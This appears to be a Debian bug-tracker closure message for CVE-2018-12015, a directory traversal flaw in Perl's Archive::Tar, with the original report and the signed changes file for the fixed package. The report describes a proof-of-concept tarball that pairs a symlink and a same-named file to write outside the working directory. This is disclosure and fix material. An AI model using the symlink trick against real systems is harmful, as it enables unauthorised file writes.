Bug#900834: marked as done (perl: CVE-2018-12015: Archive::Tar: directory traversal)

Debian Bug Tracking System Tue, 12 Jun 2018 15:07:07 -0700

Your message dated Tue, 12 Jun 2018 22:04:09 +0000
with message-id <e1fsrob-00093s...@fasolo.debian.org>
and subject line Bug#900834: fixed in perl 5.24.1-3+deb9u4
has caused the Debian Bug report #900834,
regarding perl: CVE-2018-12015: Archive::Tar: directory traversal
to be marked as done.


This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
900834: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=900834
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

--- Begin Message ---
Source: perl
Version: 5.26.2-5
Tags: security
By default, the Archive::Tar module doesn't allow extracting files outside the current working directory. However, you can bypass this secure extraction mode easily by putting a symlink and a regular file with the same name into the tarball.
I've attached proof of concept tarball, which makes Archive::Tar create /tmp/moo, regardless of what the current working directory is:
  $ tar -tvvf traversal.tar.gz
  lrwxrwxrwx root/root         0 2018-06-05 18:55 moo -> /tmp/moo
  -rw-r--r-- root/root         4 2018-06-05 18:55 moo

  $ pwd
  /home/jwilk

  $ ls /tmp/moo
  ls: cannot access '/tmp/moo': No such file or directory

  $ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'

  $ ls /tmp/moo
  /tmp/moo

--
Jakub Wilk
traversal.tar.gz
Description: application/gzip

--- End Message ---

--- Begin Message ---

Source: perl
Source-Version: 5.24.1-3+deb9u4

We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 900...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Dominic Hargreaves <d...@earth.li> (supplier of updated perl package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sun, 10 Jun 2018 18:37:28 +0100
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.24 libperl-dev perl-modules-5.24 
perl
Architecture: all amd64 source
Version: 5.24.1-3+deb9u4
Distribution: stretch-security
Urgency: high
Maintainer: Niko Tyni <nt...@debian.org>
Changed-By: Dominic Hargreaves <d...@earth.li>
Closes: 900834
Description: 
 libperl5.24 - shared Perl library
 libperl-dev - Perl library: development files
 perl-base  - minimal Perl system
 perl-debug - debug-enabled Perl interpreter
 perl-doc   - Perl documentation
 perl       - Larry Wall's Practical Extraction and Report Language
 perl-modules-5.24 - Core Perl modules
Changes:
 perl (5.24.1-3+deb9u4) stretch-security; urgency=high
 .
   * [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
     in Archive-Tar (Closes: #900834)
Checksums-Sha1: 
 af207347626b1c7c67cfe3694c41500627f82f2c 2393 perl_5.24.1-3+deb9u4.dsc
 8b880f01eb868807f669bbc37306b435aeb0fcae 179936 
perl_5.24.1-3+deb9u4.debian.tar.xz
 efad4d938b9da447909ada8dba9cb509365b69e2 5148 
perl_5.24.1-3+deb9u4_source.buildinfo
 9d1bcc0c28b32f4e876951a9f0cd08246b5aa5b5 2755282 
libperl-dev_5.24.1-3+deb9u4_amd64.deb
 735e87412d5cdf6927b302a7245aff00c53b1a62 3522222 
libperl5.24_5.24.1-3+deb9u4_amd64.deb
 32d7f11f6b90ff202e9a708bda4a7189b39432c7 1344606 
perl-base_5.24.1-3+deb9u4_amd64.deb
 3eaa55757469bf8d8568391950eb552cd88e8521 6654658 
perl-debug_5.24.1-3+deb9u4_amd64.deb
 632d982fcdda3d6e65991a75a9fcab4512305c95 7145986 
perl-doc_5.24.1-3+deb9u4_all.deb
 6daa8b346fdc5377af1b34ba2a221fc756939fe4 2723830 
perl-modules-5.24_5.24.1-3+deb9u4_all.deb
 a36604cb1399c2afddc5a34f502cffff9e7eca0b 5787 
perl_5.24.1-3+deb9u4_amd64.buildinfo
 26714cb0a97ff01c13b3802f2ec86ce44163dac7 218478 perl_5.24.1-3+deb9u4_amd64.deb
Checksums-Sha256: 
 439fd400e8f7659679acac82bb6178c33e1c7cea161210c5051f8c78c2df004b 2393 
perl_5.24.1-3+deb9u4.dsc
 96b1e96a4ac72bb937f53079806fe0d6127da8fbf40d113d618a240aa378745c 179936 
perl_5.24.1-3+deb9u4.debian.tar.xz
 3395fefebdc09d87a3b0a5ac5b4b0039ff803d43fd686fa19ba7473688e099fe 5148 
perl_5.24.1-3+deb9u4_source.buildinfo
 0321c89a988bb0f1430a92943fa1c83e907c74e86b81021b422af34a24a7212c 2755282 
libperl-dev_5.24.1-3+deb9u4_amd64.deb
 e010ab8e7178c2271033aa199f925f1c2fd46e879d222462eaad35d1f7eaedea 3522222 
libperl5.24_5.24.1-3+deb9u4_amd64.deb
 914985af488a14268b911de8b06e082165f362e3d3c6a52581aa2619d557e1ea 1344606 
perl-base_5.24.1-3+deb9u4_amd64.deb
 02e3eb8c853e5caa558512ed6d48d0dcdb9d99692585ebd77fd22ddb62234f91 6654658 
perl-debug_5.24.1-3+deb9u4_amd64.deb
 a483bc64c3936ce99b3ae76430d644c3c784f879819ef49d74f0d4365b4c3020 7145986 
perl-doc_5.24.1-3+deb9u4_all.deb
 97ef07235d452887148df4791b24d50af224bebd47e90970d3b26eead718c330 2723830 
perl-modules-5.24_5.24.1-3+deb9u4_all.deb
 485ed8287ff61c4d1d855c55ca4801cda41106ef9c207411cc62a51a73b26945 5787 
perl_5.24.1-3+deb9u4_amd64.buildinfo
 9f9829e5a44de48877a8ff172cf1c25aefb2dc23ee8cd508dea7d8a877d4ff30 218478 
perl_5.24.1-3+deb9u4_amd64.deb
Files: 
 45d7c95ff04ee4a8300fdc8515789136 2393 perl standard perl_5.24.1-3+deb9u4.dsc
 ab7a46240a333c6891ec737d97a57f3b 179936 perl standard 
perl_5.24.1-3+deb9u4.debian.tar.xz
 bca10b7f8812b1277e723c10c6abb015 5148 perl standard 
perl_5.24.1-3+deb9u4_source.buildinfo
 ba4de357e2e56f6ec5035f004c3a2441 2755282 libdevel optional 
libperl-dev_5.24.1-3+deb9u4_amd64.deb
 09b2d8a4fc06cd455f9937109738be42 3522222 libs optional 
libperl5.24_5.24.1-3+deb9u4_amd64.deb
 50f96a0c7220ef449601b4ac1605ea89 1344606 perl required 
perl-base_5.24.1-3+deb9u4_amd64.deb
 45fa6e304b63e60afc38184266ae76b5 6654658 devel extra 
perl-debug_5.24.1-3+deb9u4_amd64.deb
 65a2e7562defc2f3aa8fa75d7d761e63 7145986 doc optional 
perl-doc_5.24.1-3+deb9u4_all.deb
 9c5837ae2d97e0ae837a6469472b9c4a 2723830 perl standard 
perl-modules-5.24_5.24.1-3+deb9u4_all.deb
 36e7f2b306ed5f05c17d5562e9b0dba2 5787 perl standard 
perl_5.24.1-3+deb9u4_amd64.buildinfo
 1937c69554f677fb5781f5922d22b6a1 218478 perl standard 
perl_5.24.1-3+deb9u4_amd64.deb

-----BEGIN PGP SIGNATURE-----

iQJBBAEBCAArFiEEy0llJ/kAnyscGnbawAV+cU1pT7IFAlsdai4NHGRvbUBlYXJ0
aC5saQAKCRDABX5xTWlPsldSEACJEFQ4rwkJAS5js3R8XBMhfidxVUGYOkB2jGnk
EFte7lFzVeFk40qPj7hMbGOl5SRyPoBwTwTFu8qdvmwcO05WsP7eIUHeJ5PfAlSm
B1xt7yohK3FkUNT7BEw7fC/6N1exi37JaUg7/N4LcYf5Cyy7Fmn5x909JprU3a8Z
Tk/PBvnhv8pDczK7nPhUdiO60UwXFP7EHbKwnc9UPrCCzFD+0639D0xJOUhqAFoc
sNKNsUbxy/wb1i5PHwsDblIXSAcmUQN/EwWD64UeV5dx/HRlQ8KjH9uVDpg9Wlj4
hSjR6zD6V9YJ5nlr7vdjNFFMyWznHyibOy57iK4O/S1JmxiWo6UUkdERqOD29Uvx
12pUMa0oVHxr/OITc4ZcUbAyzKVdXDKEu5TSPjyvidMHRkVQTybMdfDpTgH3i1k7
LPjrvPKBZrJZmj52RnHQ7pRX8kJoueMS3YoJIrbxHelkGEi33F6njza3lTwLR2xX
Th4Lst8sX0arCK5szpUBpBVJgJA+Ho2dUNvp5Ae2XD/rAfTTZKiYtnUrOFS02xSC
N13F8xIW43qxYR0OS6u7IYWB/BO60WMP3q4BJCdrMUIqBNDVQ3+f8WVJg/auCXLy
lGXCcpuOl0LAetfobn/O9TMoqXcFvZoV1OWfOqMAl/DjghPPtDeQ+Y38iFmcpeY8
8ynVBw==
=0Ojb
-----END PGP SIGNATURE-----

--- End Message ---

Bug#900834: marked as done (perl: CVE-2018-12015: Archive::Tar: directory traversal)

Reply via email to